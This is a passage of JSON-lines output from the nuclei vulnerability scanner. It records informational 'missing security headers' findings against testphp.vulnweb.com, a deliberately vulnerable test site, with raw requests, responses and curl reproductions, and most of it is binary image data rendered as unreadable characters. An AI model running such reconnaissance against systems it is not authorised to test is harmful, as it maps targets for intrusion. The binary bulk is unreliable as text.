ufffd]\\ufffd0\\ufffdG\\ufffd6\\ufffd\\ufffd\\u0014\\ufffdn\\ufffd\\u001d\\ufffd\\u0000:\\ufffd*_\\\\\\ufffd\\ufffd1y\\ufffd|\\ufffd\\ufffd\\u0004aM\\ufffdv\\ufffdF\\ufffdB\\ufffd_j\\ufffd\\ufffd(\\ufffd\\u0006\\ufffd\\ufffdo^\\ufffd\\ufffd\\ufffd\\\\\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd23\\u001e\\ufffde\\ufffd\\u001d\\u0013p\\u0004\\ufffd\\u0004\\ufffd\\u0007\\ufffd\\u003c\\u000f\\ufffd\\u001a\\ufffd3\\ufffd$\\u0003\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdm\\u0005\\ufffd\\u001cKF\\ufffd\\u003e羝c\\u0015\\u0015ڵ\\ufffd\\ufffd\\ufffd'\\u0013\\u001e\\ufffd\\ufffdv\\\\\\ufffd\\ufffd \\ufffd͖\\ufffd䊾\\ufffd(\\ufffd\\u003c\\ufffd\\ufffd8}\\u000e\\u0012\\ufffdg\\u0026m\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd\\ufffd4Ǒx\\ufffdN\\u0015/]\\ufffds\\ufffd\\ufffd\\u000e\\ufffdohN/O\\ufffdy1!n9e\\ufffd\\ufffd7\\ufffd\\u0018\\ufffd(\\ufffd\\u0006\\ufffdǕ}\\ufffd\\ufffda\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffda\\n\\u0001㶎\\ufffd@ \\u001f\\ufffd\\ufffd\\ufffdƍ\\ufffd\\ufffd\\u0007Τ\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0010\\u0000@\\ufffd18\\ufffd\\ufffd\\u001d\\u0017\\u001bX\\u001e\\ufffdBH\\\\c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd܂4B\\u001e~\\ufffd\\\\։\\u0004\\ufffd\\ufffd?MP\\ufffd\\ufffdI\\r\\ufffd\\ufffdݹ\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI\\ufffd wfc\\ufffd\\u0015\\u0014Y\\ufffd\\ufffd@\\u0000{\\u0001\\ufffd\\ufffd4ר.Yp\\ufffd4E\\n#\\ufffdV$|\\ufffd\\u001bo4l]\\u001e;\\ufffd\\ufffd\\ufffd̼KT2wT\\ufffd\\ufffd\\u0013\\ufffd\\u001b?1\\ufffd\\ufffd\\ufffd\\u001e\\u0007\\ufffdIuR\\u003c+7\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd!{\\u0010O\\ufffd\\u0013\\u000e\\ufffd3Y\\u0016D\\ufffdcb\\u0003\\ufffda[\\ufffd\\u0018X\\u0006\\ufffd\\ufffd\\u0001\\ufffdڹ\\u00122[a\\ufffd\\u0007\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\\\,eґAU!@\\ufffd߸\\u001c\\ufffd\\u00007ި{k\\u000f\\ufffd\\ufffd}Y\\ufffd\\ufffd\\ufffd\\ufffd٢\\ufffd\\u000c\\u0018ϰ|\\u000f\\ufffd\\ufffd_\\u000f┃\\u001f\\ufffdފ%\\rD_'r\\ufffd\\ufffd\\u0004W\\u0017ߛ\\u0000\\ufffd1\\ufffd\\u0000\\u001bu\\u0015\\ufffd̝\\ufffd(\\ufffd\\ufffd]\\ufffdT\\u0016\\ufffdl\\ufffd\\ufffdLn\\ufffd\\ufffd\\u0015Wܒöc#v8\\ufffd9m\\\\\\ufffd\\ufffd\\u001bQ\\ufffdBֈ\\ufffd]\\ufffd\\ufffd^\\ufffd9\\u0001\\ufffd.ϕ\\ufffd\\ufffd\\ufffdN\\ufffdş\\ufffd\\ufffdן\\ufffd\\ufffd\\ufffdl\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\ufffdp72\\ufffd\\ufffdܮ\\t\\u001f\\ufffdT\\ufffd\\ufffdn;\\\\M\\u0005\\u0026\\ufffder\\ufffd\\u0006\\ufffdE\\ufffdn\\ufffdQ\\u003cv\\u003cX44:\\u0002Ɖ\\ufffd{\\ufffd\\ufffdh\\ufffd@G\\ufffd\\ufffdU\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd1\\ufffdO\\ufffdY\\ufffdu\\ufffd\\ufffd0ر\\u0016p7\\u001d\\ufffd\\ufffd\\ufffd\\u0000^O\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdWƂ\\ufffd,\\ufffdN\\ufffdN\\ufffd\\ufffd\\u0000I\\ufffdL\\ufffd:\\ufffd%\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\t\\ufffd\\u000cL\\ufffd\\ufffd\\ufffdP\\ufffd\\u001d\\u0016\\u001c\\ufffd#\\r1eC`m\\u000bb\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffdǁE\\u0026\\u0026zez\\ufffd\\ufffd\\ufffd\\u0018(P\\ufffd[\\ufffd\\u001b6\\ufffd7F\\ufffd\\ufffd\\ufffd\\ufffdp5~\\u0014\\ufffd\\ufffd\\u0001FR=\\ufffd\\ufffd|`\\rk\\ufffdT\\ufffd\\ufffde\\ufffdh\\ufffd\\u003e/\\ufffdH\\ufffd}Y\\\\\\ufffd\\ufffdqH\\ufffdG\\ufffd\\u0001~/p\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0000\\ufffd\\u001a)V4\\ufffd\\u0004J\\ufffd\\u000e\\ufffd\\ufffd\\u0018\\ufffdE\\n\\u003c\\ufffd\\ufffd^\\ufffdֆ\\u0008\\ufffd\\u0003\\ufffd\\u001d\\u000c \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̯~O L\\ufffd?W\\ufffd\\ufffd#\\ufffdVV\\ufffdf\\ufffddJ2P;\\ufffd\\ufffd;\\ufffdU\\n\\ufffdY\\ufffd\\ufffd\\ufffd:\\ufffdx\\u001d\\u003e6\\ufffd7\\ufffd-\\ufffd\\ufffdV2ށ,F\\ufffd7\\u000f\\ufffd\\ufffdأ}\\ufffdj#\\ufffdR;\\r\\\\\\ufffd\\u003e\\u0016]\\ufffd1\\ufffdp\\u003c\\ufffd\\ufffd\\u003e\\ufffdw\\ufffd\\ufffd1\\u000c\\u001f\\u0015\\ufffd\\ufffd4%\\u0000\\ufffd\\u001e\\ufffdV(\\ufffd\\ufffd捀A\\u0006\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd\\u001f\\ufffdP\\ufffd\\u000e\\u003eT\\ufffd\\u0015\\ufffdr\\u0002:\\ufffdb\\ufffd\\u00057`\\u001e\\t\\ufffd\\ufffd\\ufffd\\ufffdӡb\\ufffd\\ufffd#GUz\\ufffd\\u000e\\ufffdh\\n\\u0003m\\ufffd\\u0001\\ufffd@d\\ufffd\\u001b\\ufffd4\\u00016\\ufffd\\ufffdx\\ufffd\\u003cJ\\u0002\\ufffdc\\ufffd)a`\\u001a\\u0026\\ufffdw\\ufffd\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffd\\ufffd~ M\\ufffdn\\ufffdu\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd{\\u001a\\u0004\\ufffd{\\ufffd\\ufffd\\ufffdLq\\ufffd\\ufffd,\\ufffd\\ufffd\\\\\\ufffd\\t\\ufffd\\ufffdSI\\ufffdS{\\u001b\\ufffdG\\ufffd\\u000f\\ufffd\\ufffd\\ufffd|;!\\ufffd\\u0010\\ufffd\\ufffd\\ufffd\\u0026r.\\ufffd*\\ufffdT[\\u000e~m\\ufffdh_\\ufffd\\ufffdF\\ufffd\\u001d\\u0003\\ufffd\\ufffdVwM\\ufffd\\ufffd9\\ufffdI\\ufffd4\\ufffd\\ufffdƕ\\u0003!\\u003cw#m\\ufffd\\ufffd}\\ufffd\\ufffd\\u0016\\u000eO\\\"@\\ufffdzϞ\\ufffd\\u003cp#3\\ufffd\\u0000\\ufffd)=\\\\\\ufffd\\tP\\ufffd\\u0000\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd0\\ufffd!\\u000c\\ufffd\\ufffd#J״\\ufffd`S\\ufffd\\u003c|\\ufffd\\ufffdW\\ufffd1\\ufffdۜ\\ufffdH\\\",h*\\ufffd:S)}\\ufffd\\ufffdu\\ufffdb\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdD#\\u0001{\\ufffd\\u001a\\ufffd\\ufffdB\\ufffd\\u0006\\ufffd;\\ufffd\\ufffd4X\\ufffd\\u000b~M\\u0002k\\ufffd\\u000e\\ufffd?O\\ufffd\\ufffd\\ufffd6@BѻF\\ufffd\\u001c:\\ufffd5`\\ufffdD\\u001a\\ufffd\\ufffd\\ufffd\\u0000m\\u0005\\ufffd\\n\\ufffdH\\ufffd\\ufffd\\u0003w\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdbj\\\\\\ufffd\\u0007\\ufffd\\ufffdt\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdx\\ufffdZ3HСD%\\ufffd\\ufffd\\ufffd\\ufffdT\\ufffd\\u0017B\\ufffd\\u001e\\ufffd\\ufffdv\\ufffd\\ufffd\\u0002\\ufffd\\ufffd[\\ufffdB\\u003ecc\\ufffdu\\ufffdP\\ufffd|\\ufffd\\ufffd\\ufffd˃d\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0016@;\\u001et\\ufffd\\ufffd\\ufffdI q\\ufffd\\ufffd\\ufffd\\u001c|\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdCL\\ufffd\\ufffd1\\ufffd%@\\ufffdB\\ufffd\\ufffd\\u0008\\u0004\\ufffd5\\ufffd\\u001b\\u0017V\\u003c\\ufffd8\\ufffd\\ufffd#\\ufffdQ\\u001364\\ufffdE#Fɹ\\u0018\\ufffd\\ufffd\\ufffdk\\u000e\\u003c\\u0010H#\\ufffd$jΒޤ~\\ufffd\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdZ\\ufffd:\\u000f\\u001d'5\\ufffd\\ufffd\\ufffd\\ufffdzs;\\ufffdӤ\\ufffd\\ufffd6\\ufffd\\r\\u0015$i\\ufffd⤠nE?q\\ufffd\\ufffd\\ufffdsK\\u0019h\\u0018\\ufffd( \\ufffd5d]_﫺fw\\ufffdL\\u0019\\u0000$\\ufffdk\\ufffd\\u0000G\\ufffd\\\\\\ufffd\\ufffdЧO\\ufffd\\ufffdm\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffdx\\u0004]\\ufffd}\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffd$0ώ\\ufffd\\ufffd\\u0010\\ufffdB7314\\u0015Tr\\ufffd\\ufffd\\u0000\\ufffd\\ufffdc\\ufffdj\\ufffd\\ufffd\\ufffd\\u001aJ\\ufffd]A\\u0017tG\\ufffd\\u0007L\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd嶰g\\ufffd8\\ufffd\\ufffdW\\u001f\\\"F\\ufffd\\\\\\t\\u0013\\ufffdS\\ufffd\\ufffd_c\\ufffd:\\ufffd\\ufffd\\ufffdGYy\\ufffd\\u0002z\\ufffd\\ufffd\\u0011;U\\ufffd\\ufffd\\ufffd\\u0001I\\ufffd\\ufffd]\\ufffdw\\ufffdگ\\ufffdd\\ufffdt\\ufffd\\ufffdXs\\u001d\\ufffdfW\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffdx\\u0004X\\ufffd/\\ufffdW\\ufffd\\ufffd\\ufffd\\ufffdD\\u0005\\u0015\\ufffdC7\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffdp+β]\\u001b\\ufffd\\u003cl\\ufffd}Rޒ\\u000b\\ufffdC]\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:07.816118945Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"path\":\"/cgi-bin/1\",\"matched-at\":\"http://testphp.vulnweb.com/cgi-bin/1\",\"request\":\"GET /cgi-bin/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=iso-8859-1\\r\\nDate: Wed, 13 Nov 2024 02:41:39 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//IETF//DTD HTML 2.0//EN\\\"\\u003e\\n\\u003chtml\\u003e\\u003chead\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003c/head\\u003e\\u003cbody\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on this server.\\u003c/p\\u003e\\n\\u003chr\\u003e\\n\\u003caddress\\u003eApache/2.4.46 (Ubuntu) Server at localhost Port 8000\\u003c/address\\u003e\\n\\u003c/body\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:08.007444444Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51' 'http://testphp.vulnweb.com/cgi-bin/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"path\":\"/pictures/3.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/3.jpg.tn\",\"request\":\"GET /pictures/3.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3725\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-e8d\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0004\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0005\\u0006\\u0007\\u0008\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0003\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061A\\u0013\\\"Q\\u00142a\\u0007q\\ufffd\\u0015B\\ufffd\\u0008\\u0016#3C\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0003\\u0005\\u0006\\u0007\\u0001\\u0004\\ufffd\\ufffd\\u00002\\u0011\\u0000\\u0001\\u0003\\u0003\\u0002\\u0003\\u0005\\u0007\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u00111\\u0005!\\u0012\\u0013A\\u0014Qaq\\ufffd\\u0006\\\"#\\ufffd\\ufffd\\ufffd\\ufffd2\\ufffd\\ufffd\\ufffd3R\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffdW\\ufffdz\\ufffdM.\\ufffdwow\\n\\ufffdC$\\u0012\\ufffd\\ufffd\\u001b\\ufffd2\\t\\ufffd\\u0004\\u001f\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\u0013u\\u001b;6\\ufffd\\ufffd\\ufffdŎp6\\ufffdI\\ufffd\\u0000l\\u0000\\u0000\\u003c\\ufffd\\ufffd\\ufffd\\ufffdI$\\ufffd\\r\\ufffd\\ufffd\\ufffdxU\\ufffd/E\\ufffd]\\ufffd\\ufffd\\ufffd\\u001b\\u0018\\u0000\\u0000\\u0002\\ufffd\\u0010I\\ufffd8\\u0002\\ufffd_A\\ufffd\\ufffd\\u001f\\t;7\\ufffd^\\ufffdJ\\ufffd\\ufffd\\u0013^\\u0006\\ufffd\\ufffdMB\\ufffd\\ufffdN\\ufffdM\\ufffd]\\ufffdk\\u001b0Ei\\ufffd\\u0008\\u0019\\ufffd\\ufffd\\ufffd54R$\\ufffd\\ufffd\\u001c\\ufffdb\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd}\\ufffd\\ufffd\\ufffd\\u0026\\ufffdng\\ufffd\\u001at\\ufffd\\ufffd\\ufffd\\u0010\\ufffdV^\\ufffd\\u001eB7\\ufffd\\ufffd\\ufffd܌\\ufffd\\ufffd\\u000b\\ufffdд\\u000bk\\u0013!\\ufffd\\ufffd\\ufffd#\\u001a\\ufffd\\u0000\\ufffd\\u001f\\ufffd\\ufffd\\u0017\\ufffd\\u0018\\ufffd\\ufffd@\\u001cq\\ufffd\\ufffdx\\ufffd\\ufffdC\\ufffd\\ufffd2Xn\\ufffd\\ufffd\\ufffd\\ufffd^W\\ufffd\\ufffd9\\ufffd\\ufffd,\\u001a=J\\ufffd\\r\\u0015\\ufffd\\ufffd[\\ufffdV\\ufffd\\ufffdN\\ufffdn./u\\u0012\\ufffd\\\\Or-\\ufffdF\\ufffd\\ufffd\\ufffd\\u000b\\ufffd\\t\\ufffd\\ufffd\\ufffd\\ufffdv\\u001cg\\u003cF*\\u0012\\ufffd\\ufffdJYLR\\rǟ\\ufffdKST\\ufffd\\ufffd\\ufffd\\ufffdE\\u0014Q^e\\ufffd\\ufffdc\\u000c\\u001aJy\\u0019\\ufffd+\\ufffd\\\\\\ufffdt8\\u0026\\ufffdJF)+\\ufffdh\\ufffd\\ufffd(B(\\ufffd\\ufffd\\u0010\\ufffdF))\\ufffd)\\ufffd\\ufffd\\ufffdM\\ufffdQE\\u0014%-#\\ufffd\\ufffd\\ufffd\\u003cu|\\ufffdq\\ufffd\\ufffd,\\ufffd\\u000e\\u0016(W\\ufffd.\\ufffd\\ufffd \\ufffd(9\\ufffd\\ufffd!N\\u0000\\u000c̀\\ufffd\\u001d\\u0002H\\ufffd\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd#\\ufffd\\ufffdj\\ufffd]\\ufffd\\ufffd6\\u001a\\ufffd\\ufffd픆+\\ufffdw\\u0012D\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdG\\ufffd\\ufffdu=\\u000b\\ufffdr\\ufffd!D\\ufffd4\\ufffd\\ufffdp\\ufffd5\\ufffd\\r\\ufffd\\ufffd\\n6\\ufffd\\ufffd\\ufffd\\ufffd\\u000eq\\ufffd\\ufffd\\u0003\\ufffd6\\ufffd\\ufffdh\\ufffd\\ufffd\\ufffdψq\\u001e\\ufffd\\u001f\\ufffdUA\\ufffdk\\ufffdJ8/a\\ufffd\\ufffdwS\\ufffd6\\ufffd\\u0010\\ufffd\\u0015\\u0002M\\ufffd㴞\\u0008\\ufffd\\ufffd\\ufffd\\ufffd|V\\u0011\\u0014*\\r\\ufffd\\u0011K\\ufffd\\ufffd\\ufffdΥ\\ufffdb\\ufffd\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\u001c\\\"\\ufffd\\u001c\\ufffd\\ufffd\\u0005\\u0001\\ufffd)9\\ufffd\\u0004\\u00023\\ufffd\\ufffd\\u0003Vnt\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0018\\u000c\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd;\\ufffdT\\u0018#4\\ufffd\\u0003\\ufffd\\ufffd$_\\ufffd\\ufffdLj\\ufffds\\u001fτ\\ufffd\\u0003\\ufffd5F\\ufffde}^\\ufffd錛\\ufffd˹Q\\ufffdܟݸn\\\\\\ufffd2pI\\ufffd\\u000e\\u0018\\ufffd\\ufffdp\\ufffdA\\u001bD\\ufffd$c+\\ufffd\\u001bP\\ufffd\\u000e\\ufffdr\\ufffd}\\ufffdی\\ufffd2@\\ufffd+E\\ufffdX\\ufffd\\ufffdl\\ufffd\\ufffdI$\\ufffd\\\\͈\\ufffd1\\ufffd\\u0018.\\ufffd\\u0005\\ufffd\\ufffd\\ufffd\\u001cs\\ufffdc\\u0007\\ufffdn\\ufffd\\u001f\\ufffd\\u0012K\\ufffdY\\ufffd\\u0017\\ufffd\\ufffd\\u000eO\\ufffd6\\u0001 \\u0012pH\\u001cx\\ufffd5\\u0013\\ufffdhkj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffd\\u0003\\ufffdі4\\ufffdT\\ufffd\\ufffd\\u0019쥺{\\ufffdB[\\ufffd=\\ufffd\\u003c\\n\\u0010 \\ufffd\\u001d\\ufffdm9ov\\ufffdy\\ufffd\\u0003\\ufffd;\\u0000\\ufffd[Qm+\\ufffdfԯ`\\u0002HmIJB\\ufffd\\u0002\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u00157\\ufffdw\\ufffd\\ufffd\\ufffdRH\\ufffd/\\ufffd\\ufffdnTz\\ufffd\\ufffd\\t\\ufffd\\ufffd;C\\ufffd\\u000f\\u0019\\u0007;\\\\\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdҼ\\ufffd\\ufffd29\\u0006H\\u001bm\\ufffd:)\\ufffd\\ufffd{\\u0014%\\ufffdw\\ufffd\\ufffd4\\u000f\\ufffd{\\ufffdR\\ufffdK\\u001b\\ufffd)R{\\ufffd\\ufffd\\ufffdKA\\ufffd\\ufffdy\\u0019U)\\ufffd\\ufffd 